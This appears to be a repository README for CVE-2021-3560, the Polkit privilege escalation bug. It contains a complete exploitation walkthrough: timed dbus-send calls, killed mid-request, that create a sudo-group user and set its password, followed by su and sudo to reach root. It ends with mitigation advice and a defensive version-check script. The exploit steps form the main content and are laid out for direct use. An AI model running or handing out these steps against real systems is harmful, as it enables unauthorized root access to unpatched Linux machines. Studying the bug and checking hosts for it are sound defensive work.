# Privesc With a Seven-Year-Old Bug

Privilege Escalation via Polkit (CVE-2021-3560)
## Overview

This repository provides information on exploiting a seven-year-old privilege escalation vulnerability in Polkit, identified as CVE-2021-3560. The bug allows an unprivileged local user to gain root access using standard Linux command-line tools.

Polkit is a system service used in many Linux distributions to manage privileges. The vulnerability was publicly disclosed on June 3, 2021, and a patch has been released.
## Affected Distributions

The vulnerability was introduced in Polkit version 0.113 and affects various distributions:

| Distribution | Vulnerable? |
|---|---|
| RHEL 7 | No |
| RHEL 8 | Yes |
| Fedora 20 (or earlier) | No |
| Fedora 21 (or later) | Yes |
| Debian 10 ("buster") | No |
| Debian Testing ("bullseye") | Yes |
| Ubuntu 18.04 | No |
| Ubuntu 20.04 | Yes |
## How Polkit Works

Polkit acts as a permission manager for privileged operations. It determines whether a user is authorized to execute certain actions, either granting immediate approval or requiring authentication via a dialog box.

Commands like `pkexec` and `dbus-send` interact with Polkit. The latter is particularly relevant for this exploit.
## Exploitation Steps

1. Install the necessary packages (if not already installed):

   ```sh
   sudo yum install accountsservice gnome-control-center   # RHEL-based
   sudo apt install accountsservice gnome-control-center   # Debian-based
   ```

2. Measure the execution time of a normal user-creation attempt:

   ```sh
   time dbus-send --system --dest=org.freedesktop.Accounts \
     --type=method_call --print-reply \
     /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser \
     string:opslinux string:"Opslinux" int32:1
   ```

3. Exploit the vulnerability by killing the process at the right moment:

   ```sh
   dbus-send --system --dest=org.freedesktop.Accounts \
     --type=method_call --print-reply \
     /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser \
     string:opslinux string:"Opslinux" int32:1 &
   sleep 0.008s ; kill $!
   ```

4. Check whether the user was created:

   ```
   $ id opslinux
   uid=1002(opslinux) gid=1002(opslinux) groups=1002(opslinux),27(sudo)
   ```

   If successful, the user appears with sudo privileges.

5. Set a password for the new user:

   ```sh
   $ openssl passwd -5 'hellodude!'
   ```

   Use the hashed output in the following command:

   ```sh
   dbus-send --system --dest=org.freedesktop.Accounts \
     --type=method_call --print-reply \
     /org/freedesktop/Accounts/User1002 org.freedesktop.Accounts.User.SetPassword \
     string:'<HASHED_PASSWORD>' string:GoldenEye &
   sleep 0.008s ; kill $!
   ```

6. Gain root access:

   ```sh
   su - opslinux
   sudo su
   ```
## Technical Details

- The vulnerability exists in how Polkit retrieves the UID of a process.
- Killing the `dbus-send` process at the right moment makes Polkit treat the request as coming from UID 0 (root).
- Exploitation is non-deterministic due to timing variations.
- The bug is in `polkit_system_bus_name_get_creds_sync()`, where errors are improperly handled.
## Mitigation

- Update your system:

  ```sh
  sudo apt update && sudo apt upgrade   # Debian/Ubuntu
  sudo yum update                       # RHEL/Fedora
  ```

- Manually patch Polkit if updates are unavailable.
- Use SELinux or AppArmor to restrict Polkit actions.
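A quick host check, added here as an example and not part of this repository's code: it parses `pkaction --version`, flags a Polkit build of 0.113 or later as being in the range the table above lists as affected, and reports whether the accountsservice interface the write-up relies on is installed. The D-Bus service file path is an assumption about standard packaging; distributions backport fixes, so a version in range means "confirm against the vendor advisory", not "vulnerable".

```shell
# Added example, not part of this repository: reports whether this host runs a polkit
# build in the range the table above calls affected (0.113 and later) and whether the
# accountsservice D-Bus interface exists. Distributions backport fixes, so a version in
# range means "check the vendor advisory", not "vulnerable". Service file path is assumed.

# version_ge A B: exit 0 when dotted version A >= B (handles "0.113" as well as "123").
version_ge() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0
            yi = (i <= nb) ? y[i] + 0 : 0
            if (xi > yi) exit 0
            if (xi < yi) exit 1
        }
        exit 0
    }'
}

# parse_polkit_version "pkaction version 0.105" -> "0.105" (empty on unexpected input)
parse_polkit_version() {
    printf '%s\n' "$1" | sed -n 's/^pkaction version \([0-9][0-9.]*\).*/\1/p'
}
# polkit_in_affected_range VERSION: exit 0 when VERSION is 0.113 or later.
polkit_in_affected_range() {
    version_ge "$1" "0.113"
}

# check_host prints one line per finding; it needs no privileges.
check_host() {
    if ! command -v pkaction >/dev/null 2>&1; then
        echo "polkit: pkaction not found, polkit may not be installed"
        return 0
    fi
    ver=$(parse_polkit_version "$(pkaction --version 2>/dev/null)")
    if [ -z "$ver" ]; then
        echo "polkit: could not parse 'pkaction --version' output"
        return 0
    fi
    if polkit_in_affected_range "$ver"; then
        echo "polkit $ver: in the affected range (>= 0.113), verify the vendor fix is installed"
    else
        echo "polkit $ver: below 0.113, not in the affected range"
    fi
    if [ -f /usr/share/dbus-1/system-services/org.freedesktop.Accounts.service ]; then
        echo "accountsservice: org.freedesktop.Accounts is available on the system bus"
    fi
}
```

Run `check_host` on the machine in question; the version functions are kept separate so the comparison logic can be tested without Polkit installed.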
Disclaimer: This repository is for educational and research purposes only. Unauthorized exploitation of this vulnerability is illegal and unethical.